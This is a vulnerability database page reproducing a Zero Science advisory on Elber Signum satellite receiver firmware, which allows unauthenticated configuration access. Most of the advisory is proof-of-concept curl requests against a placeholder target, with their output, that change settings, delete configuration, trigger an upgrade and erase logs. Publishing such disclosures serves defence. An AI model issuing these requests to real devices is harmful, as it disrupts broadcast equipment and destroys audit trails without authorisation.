Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormLiquidWorm, zeroscience.mkPACKETSTORM:178135
HistoryApr 18, 2024 - 12:00 a.m.

Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Insecure Direct Object Reference

2024-04-1800:00:00
LiquidWorm, zeroscience.mk
packetstormsecurity.com
84
elber signum
dvb-s/s2
ird
radio networks
vulnerability
unauthenticated configuration
hidden functionality disclosure
gjoko krstic
zsl-2024-5815
nbfm controller
embos/ip
zero science advisory
liquidworm
configuration
client-side
device
security
insecure direct object reference
elber s.r.l.

7.4 High

AI Score

Confidence

Low

JSON
`  
Elber Signum DVB-S/S2 IRD For Radio Networks 1.999 Device Config  
  
  
Vendor: Elber S.r.l.  
Product web page: https://www.elber.it  
Affected version: 1.999 Revision 1243  
1.317 Revision 602  
1.220 Revision 1250  
1.220 Revision 1248_1249  
1.220 Revision 597  
1.217 Revision 1242  
1.214 Revision 1023  
1.193 Revision 924  
1.175 Revision 873  
1.166 Revision 550  
  
Summary: The SIGNUM controller from Elber satellite equipment demodulates  
one or two DVB-S/ S2 signals up to 32APSK (single/multi-stream), achieving  
256 KS/s as minimum symbol rate. The TS demodulated signals can be aligned  
and configured in 1+1 seamless switching for redundancy. Redundancy can also  
be achieved with external ASI and TSoIP inputs. Signum supports MPEG-1 LI/II  
audio codec, providing analog and digital outputs; moreover, it’s possible  
to set a data PID to be decoded and passed to the internal RDS encoder,  
generating the dual MPX FM output.  
  
Desc: The device suffers from an unauthenticated device configuration and  
client-side hidden functionality disclosure.  
  
Tested on: NBFM Controller  
embOS/IP  
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
@zeroscience  
  
  
Advisory ID: ZSL-2024-5815  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5815.php  
  
  
18.08.2023  
  
--  
  
  
# Config fan  
$ curl 'http://TARGET/json_data/fan?fan_speed=&fan_target=&warn_temp=&alarm_temp='  
Configuration applied  
  
# Delete config  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=2'  
File delete successfully  
  
# Launch upgrade  
$ curl 'http://TARGET/json_data/conf_cmd?index=4&cmd=1'  
Upgrade launched Successfully  
  
# Log erase  
$ curl 'http://TARGET/json_data/erase_log.js?until=-2'  
Logs erased  
  
# Until:  
# =0 ALL  
# =-2 Yesterday  
# =-8 Last week  
# =-15 Last two weeks  
# =-22 Last three weeks  
# =-31 Last month  
  
# Set RX config  
$ curl 'http://TARGET/json_data/NBFMV2RX.setConfig?freq=2480000&freq_offset=0&mute=1&sq_thresh=-90.0&dec_mode=0&lr_swap=0&preemph=0&preemph_const=0&deemph=0&deemph_const=1&ch_lr_enable=0&ch_r_gain=0.0&ch_l_gain=0.0&ch_adj_ctrl=0&ch_lr_att=1&mpxdig_att=0&pilot_trim=0.0&mpxdig_gain=0.0&rds_trim=0.0&delay_enable=0&local_rds=0&output_delay=0&pi_code=0___&mpx1_enable=1&mpx2_enable=1&sca1_enable=1&sca2_enable=0&mpx1_att=0&mpx2_att=0&sca1_att=0&sca2_att=0&mpx1_gain=0.0&mpx2_gain=0.0&sca1_gain=0.0&sca2_gain=0.0&limiter_enable=false&lim_1_gain=0.0+dB&lim_1_th=0.0+kHz&lim_1_alpha=0.0+%25&setupTime=0.0+ms&holdTime=0.0+ms&releaseFactor=0.0+dB%2Fsec&lim_2_en=false&lim_2_gain=0.0+dB&lim_2_th=0.0+kHz&rds_gen=false&rt_PI=&rt_PS=&rt_plus_en=false&rt_line_A=&rt_line_B=&rt_AF=&rf_trap=0&output_trap=0'  
RX Config Applied Successfully  
  
# Show factory window and FPGA upload (Console)  
> cleber_show_factory_wnd()  
  
# Etc.  
`

7.4 High

AI Score

Confidence

Low

JSON